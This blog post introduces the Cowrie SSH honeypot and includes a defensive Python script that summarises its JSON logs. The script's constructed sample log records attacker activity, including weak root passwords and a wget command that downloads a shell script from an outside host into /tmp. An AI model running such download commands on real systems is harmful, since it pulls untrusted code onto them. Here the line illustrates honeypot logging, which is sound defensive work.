Division Zero (Div0). Copyright © 2011-2018

All rights reserved.

A Quick Glimpse at Cowrie – An SSH Honeypot

Cowrie – written by Michel Oosterhof – is a medium-interaction SSH honeypot designed to log brute-force attacks and the shell interactions performed by attackers. (Sounds familiar? Yes, it is a fork of Kippo.)

 

The motivation of this blog post is just to have a quick glimpse at Cowrie: get a brief feel for what it’s like to handle, what the deployment process looks like, and so on.

 

Everything you need is in the Github Repo

Michel did a very good job explaining what Cowrie is all about, how to set it up, etc. – it is all pretty much self-contained in the Github repo (https://github.com/micheloosterhof/cowrie).

 

Very similar to Kippo

If you’re already familiar with Kippo, you’ll be very comfortable with Cowrie. It also has many additional features on top of Kippo, which I’ve yet to play with:

  • SFTP and SCP support for file upload;

  • Support for SSH exec command;

  • Logging of direct-TCP connection attempts (SSH proxying);

  • Logging in JSON format for easy processing in log management solutions; and

  • Many, many additional commands.
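The JSON log is where the value of a honeypot sits, so here is an added example (my own code for this post, not Cowrie’s) that reads a cowrie.json file and answers the questions an analyst asks first: which sources hammered the login, which credentials Cowrie accepted, what was typed in each session, what was fetched with wget or curl, and where direct-TCP requests were aimed. The log lines are constructed for the example, the event and field names are my reading of Cowrie’s JSON output (eventid, src_ip, session, username, password, input, url, shasum, dst_ip, dst_port), and the flood check at the end is an assumption of mine about what you would want, given that the Kippo FAQ quoted later in this post says there is no limit on how many people can connect.

```python
"""Summarise a cowrie.json log.  Added example for this post, not Cowrie
project code.  Event and field names follow Cowrie's JSON output as I read
it (eventid, timestamp, src_ip, session, username, password, input, url,
shasum, dst_ip, dst_port); every line in SAMPLE_LOG is constructed."""
import json
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample of cowrie.json, one JSON object per line (shasum is
# shortened).  The last line imitates the half-written record a log
# rotation can leave behind, which the parser must skip, not choke on.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","timestamp":"2017-09-05T10:00:00.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4"}
{"eventid":"cowrie.login.failed","timestamp":"2017-09-05T10:00:01.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","timestamp":"2017-09-05T10:00:02.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4","username":"root","password":"admin"}
{"eventid":"cowrie.login.success","timestamp":"2017-09-05T10:00:03.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","timestamp":"2017-09-05T10:00:05.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4","input":"uname -a"}
{"eventid":"cowrie.command.input","timestamp":"2017-09-05T10:00:06.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh"}
{"eventid":"cowrie.session.file_download","timestamp":"2017-09-05T10:00:07.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4","url":"http://198.51.100.9/x.sh","outfile":"dl/0123abcd","shasum":"0123abcd"}
{"eventid":"cowrie.session.connect","timestamp":"2017-09-05T10:01:00.000000Z","src_ip":"198.51.100.23","session":"e5f6a7b8"}
{"eventid":"cowrie.login.success","timestamp":"2017-09-05T10:01:02.000000Z","src_ip":"198.51.100.23","session":"e5f6a7b8","username":"admin","password":"123456"}
{"eventid":"cowrie.direct-tcpip.request","timestamp":"2017-09-05T10:01:03.000000Z","src_ip":"198.51.100.23","session":"e5f6a7b8","dst_ip":"192.0.2.50","dst_port":25}
{"eventid":"cowrie.session.connect","timestamp":"2017-09-05T10:02:00.000000Z","src_ip":"192.0.2.99","session":"c9d0e1f2"}
{"eventid":"cowrie.session.connect","timestamp":"2017-09-05T10:02:05.000000Z","src_ip":"192.0.2.99","session":"c9d0e1f3"}
{"eventid":"cowrie.session.connect","timestamp":"2017-09-05T10:02:10.000000Z","src_ip":"192.0.2.99","session":"c9d0e1f4"}
{"eventid":"cowrie.session.connect","timestamp":"2017-09-05T10:02:15.000000Z","src_ip":"192.0.2.99","sess
"""


def parse_events(text):
    """Return the well-formed JSON records; skip blank or truncated lines
    rather than letting one bad line abort the whole run."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def summarise(events):
    """Aggregate the events an analyst asks about first."""
    s = {
        "attempts_per_ip": Counter(),       # login.failed + login.success
        "successful_creds": Counter(),      # (username, password) Cowrie let in
        "commands_per_session": defaultdict(list),
        "downloads": [],                    # (url, shasum): key on the hash, not the URL
        "tunnels": [],                      # (src_ip, dst_ip, dst_port) direct-tcpip
    }
    for e in events:
        eid = e.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["attempts_per_ip"][e["src_ip"]] += 1
        if eid == "cowrie.login.success":
            s["successful_creds"][(e["username"], e["password"])] += 1
        elif eid == "cowrie.command.input":
            s["commands_per_session"][e["session"]].append(e["input"])
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((e.get("url"), e.get("shasum")))
        elif eid == "cowrie.direct-tcpip.request":
            s["tunnels"].append((e["src_ip"], e["dst_ip"], e["dst_port"]))
    return s


def noisy_sources(events, window_seconds=60, max_connects=1):
    """Sources that opened more than max_connects sessions inside any
    window_seconds.  The honeypot itself imposes no per-source limit, so
    find the floods in the log and rate-limit them at the firewall."""
    connects = defaultdict(list)
    for e in events:
        if e.get("eventid") == "cowrie.session.connect":
            ts = datetime.strptime(e["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
            connects[e["src_ip"]].append(ts)
    flagged = []
    for ip, times in connects.items():
        times.sort()
        start = 0                           # sliding window over sorted times
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > max_connects:
                flagged.append(ip)
                break
    return sorted(flagged)


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    s = summarise(ev)
    print("login attempts by source:", s["attempts_per_ip"].most_common(3))
    print("credentials accepted:", dict(s["successful_creds"]))
    print("commands per session:", dict(s["commands_per_session"]))
    print("downloads (url, shasum):", s["downloads"])
    print("direct-tcpip requests:", s["tunnels"])
    print("connection floods:", noisy_sources(ev))
```

Point it at a real log with `parse_events(open("log/cowrie.json").read())`. Keying downloads on the shasum rather than the URL is deliberate: the same binary turns up under many throwaway URLs, and the hash is what you search in your sandbox or threat-intel feed.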

 

Is it secure?

Michel directed this question to the FAQ of Kippo: https://github.com/desaster/kippo/wiki/FAQ.

 

“Kippo is written in Python, and doesn’t call any external software, so it’s probably somewhat secure. Kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks (no limits on how many people can connect to it, or how many files they can download). It’s recommended to run Kippo in a well firewalled virtual machine.”

 

Conclusion

This is a really quick glimpse at Cowrie. It’s very easy to set up, and it looks very promising. I’ll do my best to find time to experiment with all the cool features written by Michel – and hopefully I’ll be able to do a more detailed write-up of Cowrie soon. So, stay tuned!

 

Here are some screenshots

 

 Running Cowrie on port 2222. ifconfig reflects the correct IP address.

 curl

 wget

 wget items remain in the fake filesystem

